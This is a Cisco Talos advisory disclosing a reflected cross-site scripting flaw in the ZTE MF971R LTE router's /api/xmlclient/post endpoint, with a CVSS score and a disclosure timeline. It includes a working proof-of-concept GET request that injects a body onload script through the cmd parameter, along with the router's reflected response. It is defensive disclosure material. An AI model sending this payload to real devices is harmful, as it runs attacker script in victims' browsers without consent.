Talos Vulnerability Report


ZTE MF971R xmlclient cross-site scripting vulnerability

October 18, 2021
CVE Number



An exploitable Cross-Site-Scripting (XSS) vulnerability exists in ZTE MF971R LTE router version wa_inner_version:BD_PLKPLMF971R1V1.0.0B06. A specially-crafted HTTP request can cause an XSS vulnerability and as a result arbitrary JavaScript code execution in the victim’s browser. An attacker needs to provide a URL to the victim to trigger the vulnerability.

Tested Versions

ZTE Corporation MF971R wa_inner_version:BD_LVWRGBMF971RV1.0.0B01
ZTE Corporation MF971R wa_inner_version:BD_PLKPLMF971R1V1.0.0B06
ZTE Corporation MF971R zte_topsw_goahead - MD5 B2176B393A97B5BA13791FC591D2BE3F
ZTE Corporation MF971R zte_topsw_goahead - MD5 bf5ada32c9e8c815bfd51bfb5b8391cb

Product URLs


CVSSv3 Score

6.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N


CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)


MF971R is a portable router with Wi-Fi support and LTE/GSM modem.

This vulnerability is present in /api/xmlclient/post API-related code, which is a part of the ZTE MF971R web applications. A specially-crafted URL sent by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.

A cmd parameter being a part of /api/xmlclient/post API is not properly sanitized in a context of XSS payload and further reflected in a HTTP response.

Request example:

GET /api/xmlclient/post?action_process=get&cmd=body%20onload%3dalert(1)%2f%2fv7yks HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 0
Connection: close


HTTP/1.1 200 OK
Server: WebServer-Webs
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block

<?xml version="1.0" encoding="utf-8"?>
<body onload=alert(1)//v7yks></body onload=alert(1)//v7yks>

The victim does not need to be logged-in to be affected by this vulnerability.


2021-06-15 - Vendor disclosure

2021-09-14 - Disclosure extension granted
2021-10-15 - Vendor patched
2021-10-18 - Public release


Discovered by Marcin 'Icewall' Noga of Cisco Talos.